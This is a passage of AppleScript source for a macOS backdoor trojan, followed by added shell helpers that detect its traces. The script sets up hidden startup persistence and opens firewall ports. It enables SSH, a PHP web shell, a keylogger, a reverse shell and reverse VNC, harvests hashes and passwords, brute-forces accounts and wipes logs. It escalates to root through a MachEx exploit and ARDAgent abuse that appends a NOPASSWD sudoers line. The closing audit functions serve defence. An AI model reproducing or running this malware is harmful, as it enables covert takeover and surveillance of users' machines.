            do shell script "touch ~/Library/Preferences/loginwindow.plist"
            do shell script "defaults write ~/Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add '<dict><key>Hide</key><true/><key>Path</key><string>" & launch_path & "</string></dict>'"
            do shell script "chmod 777 ~/Library/Preferences/loginwindow.plist 2>/dev/null"
        end try
    end if
end rerun_me_every_startup

on stuff_for_root_to_do()
    --This handler needs root!
    if debug then log_event("stuff_for_root_to_do")
    move_in()
    loosen_permissions_on_SystemLoginItems()
    rerun_me_every_startup()
    agent_86_reporting_for_duty_chief()
    its_smoky_in_here_lets_open_ports_in_the_firewall()
    enable_ssh()
    install_phpshell()
    enable_webserver()
    enable_Personal_File_Sharing()
    install_and_activate_logKext()
    pass_the_hash()
    i_have_a_secret()
    there_are_no_osx_viruses_silly_wabbit()
    i_like_you_just_as_you_are()
    is_it_safe()
    if be_quiet is not true then
        these_are_not_the_outgoing_network_communications_you_are_looking_for()
    end if
    papers_please()
    phone_home_and_try_a_different_method_if_it_fails()
    reverse_shell()
    Back_to_masters_VNC()
    nothing_to_see_here()
    throw_another_log_on_the_fire()
    --exit_stage_left
end stuff_for_root_to_do

on stuff_for_an_admin_without_sudo_to_do()
    --This is assuming that I am an admin user, I do not have a functional password and sudo is not already working
    if debug then log_event("stuff_for_an_admin_without_sudo_to_do")
    move_in()
    rerun_me_every_startup()
    enable_ssh()
    install_phpshell()
    i_have_a_secret()
    i_like_you_just_as_you_are()
    reverse_shell()
    Back_to_masters_VNC()
    is_it_safe()
    if be_quiet is false then
        papers_please()
        phone_home_and_try_a_different_method_if_it_fails()
    end if
    --exit_stage_left()
end stuff_for_an_admin_without_sudo_to_do

on stuff_for_a_regular_user_to_do()
    --This is assuming that I am a standard user, not an admin, and sudo won't work
    if debug then log_event("stuff_for_a_regular_user_to_do")
    move_in()
    rerun_me_every_startup()
    install_phpshell()
    i_have_a_secret()
    i_like_you_just_as_you_are()
    reverse_shell()
    Back_to_masters_VNC()
    is_it_safe()
    if be_quiet is false then
        papers_please()
        phone_home_and_try_a_different_method_if_it_fails()
    end if
    brute_user_accounts()
    --exit_stage_left
end stuff_for_a_regular_user_to_do


---------------------------------------------------------------------------
--Main
--------------------
--HEY! Keep in mind that outgoing communications only happen if be_quiet is set to false
--So, you might want to call is_it_safe and possibly
--these_are_not_the_outgoing_network_communications_you_are_looking_for before getting
--the IP address or sending email

if debug then log_event("Main")

--Get my preferences
read_my_plist()

--Check if sudo works already, do this immediately in case sudo's timestamp timeout is near
can_sudo_come_out_to_play()

--Check if I am a member of the admin group
whos_in_charge_here()

--Setup some folders and files
try
    do shell script "mkdir -p -m 777 '/Users/Shared/SC Info/' ~/Public/ /Library/WebServer/Documents/.PS_Store 2>/dev/null; exit 0"
    do shell script "touch " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
    do shell script "chmod -Rf 777 " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
end try

--If sudo isn't working, and I don't have a password then try using passwords I collected during previous runs on this computer.
if i_have_root_access is false and my_password is "" then
    if debug then log_event("Main: trying previously gathered passwords")
    local the_passwords, the_password
    set the_passwords to words in my_username & return
    try
        set the_passwords to {the_passwords & (do shell script "grep " & quoted form of my_username & " " & quoted form of accounts_file & " 2>/dev/null | sed -e 's/^.*://g'") & return}
    end try
    try
        set the_passwords to {the_passwords & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null") & return}
    end try
    try
        set the_passwords to {the_passwords & (do shell script "grep -v ':' ~/Public/" & quoted form of secret_file & " 2>/dev/null") & return}
    end try
    set the_passwords to {do shell script "echo '" & the_passwords & "' | tr '\\r' '\\n' | sort -u "}
    repeat with the_password in the_passwords
        try
            test_a_password_with_sudo(the_password)
            exit repeat
        on error error_message number error_number
            --Just keep trying until I am out of possible passwords
        end try
    end repeat
end if

if i_have_root_access is false then
    --Try some exploits
    if OSX_version_number_minor as number < 4 or (OSX_version_number_minor as number ≤ 4 and OSX_version_number_mini as number < 8) then
        if debug then log_event("Main: Trying MachEx")
        --Attempts to run the compiled mach exception handling exploit from the Contents/Resources directory within this script's application bundle.
        try
            with timeout of 5 seconds
                do shell script quoted form of my_resources & "/MachEx <<< \"echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers; exit\""
            end timeout
            can_sudo_come_out_to_play()
        end try
    end if
    
    if debug then log_event("Main: trying to get ARDAgent to append to /etc/sudoers")
    set tries to 0
    repeat until tries ≥ 20
        try
            set tries to tries + 1
            tell application "ARDAgent" to do shell script "echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers"
            set tries to 25
            can_sudo_come_out_to_play()
        on error error_message number error_number
            --ignore
        end try
    end repeat
end if

--Other stuff I could do
--take pictures - do shell script quoted form of my_resources & "isightcapture ~/public/\"$(date).jpg\""
--take screenshots - do shell script "screencapture -xmC ~/public/\"$(date).jpg\""
--Listen to the microphone?

if i_am_an_admin is false and i_have_root_access is false then
    if debug then log_event("Main: i_am_an_admin is false and i_have_root_access is false")
    stuff_for_a_regular_user_to_do()
end if

if i_am_an_admin is true and i_have_root_access is false then
    if debug then log_event("Main: i_am_an_admin is true and i_have_root_access is not true")
    stuff_for_an_admin_without_sudo_to_do()
    dupe_user()
    if i_have_root_access is false then alias_sudo()
end if

if i_have_root_access is true then
    if debug then log_event("Main: i_have_root_access is true")
    stuff_for_root_to_do()
end if

if all_else_fails then
    if debug then log_event("Main: all_else_fails")
    --Still to do?
    --check for passwords laying around in files to which I have read access
    --check for write access to setuid app paths, StartupItems, LoginItems, LaunchDaemons & Agents etc.
    --go into quiet mode and just wait for sudo to work or for Master to get the reverse shell or reverse VNC connections. :)
end if

if debug then log_event("THE END")
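Added defensive audit helpers, written here as an illustration and not code from the page or its authors. The functions check, from a defender's side, for the artifacts the script above leaves behind: the "<user>	ALL=(ALL)	NOPASSWD: ALL" line it appends to /etc/sudoers, the copy of itself under /Library/Caches/ that it registers in AutoLaunchedApplicationDictionary, the chmod 777 it applies to the plists it touches, and the setuid bit on ARDAgent that the whole technique depends on. Function names, the sample inputs and the stat format strings are assumptions made for this example; each function reads its input from stdin or an argument so the checks can be exercised offline.

```shell
#!/bin/sh
# Defensive audit helpers for the indicators left by the script above.
# Example code added to this page; not part of the original script.

# Print non-comment sudoers lines granting "ALL=(ALL) NOPASSWD: ALL".
# Exit status 0 if at least one line was found, 1 otherwise (grep's own status).
# Live use: sudo cat /etc/sudoers | find_nopasswd_sudoers
find_nopasswd_sudoers() {
    grep -E '^[^#]*ALL=\(ALL\)[[:space:]]+NOPASSWD:[[:space:]]*ALL'
}

# Given the output of
#   defaults read /Library/Preferences/com.apple.SystemLoginItems AutoLaunchedApplicationDictionary
# (or the per-user ~/Library/Preferences/loginwindow equivalent) on stdin,
# print every Path value pointing into /Library/Caches/. Exit 0 if any, 1 otherwise.
# Handles both quoted and unquoted Path strings in the old-style plist output.
find_cache_login_items() {
    sed -n 's/^[[:space:]]*Path = "\{0,1\}\([^";]*\)"\{0,1\};.*$/\1/p' \
        | grep '^/Library/Caches/'
}

# $1 is an octal permission string such as 644 or 777 (on macOS: stat -f %Lp FILE).
# Exit 0 if the "other" write bit is set, i.e. the file is world-writable.
is_world_writable() {
    case "$1" in
        *[2367]) return 0 ;;
        *)       return 1 ;;
    esac
}

# $1 is a four-digit octal mode such as 4755 (on macOS: stat -f '%Mp%Lp' FILE,
# an assumed format string). Exit 0 if the setuid bit (04000) is set.
has_setuid_bit() {
    case "$1" in
        [4567][0-7][0-7][0-7]) return 0 ;;
        *)                     return 1 ;;
    esac
}

# Demo on constructed sample inputs standing in for the live files named above.
printf 'root\tALL=(ALL) ALL\nalice\tALL=(ALL)\tNOPASSWD: ALL\n' \
    | find_nopasswd_sudoers | sed 's/^/sudoers NOPASSWD grant: /'
printf '(\n    {\n        Hide = 1;\n        Path = "/Library/Caches/AppleScript.tht";\n    }\n)\n' \
    | find_cache_login_items | sed 's/^/login item under \/Library\/Caches: /'
is_world_writable 777 && echo "mode 777 is world-writable"
has_setuid_bit 4755 && echo "mode 4755 carries the setuid bit"
```

On a live machine the same helpers are fed from the real artifacts: the sudoers file, the two defaults domains the script writes to, and the modes of com.apple.SystemLoginItems.plist, loginwindow.plist and the ARDAgent executable. A NOPASSWD grant for an ordinary user, a hidden login item living in /Library/Caches, or a world-writable preferences plist is each a concrete indicator worth alerting on, and the setuid check documents whether the host is still exposed to the underlying ARDAgent issue.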
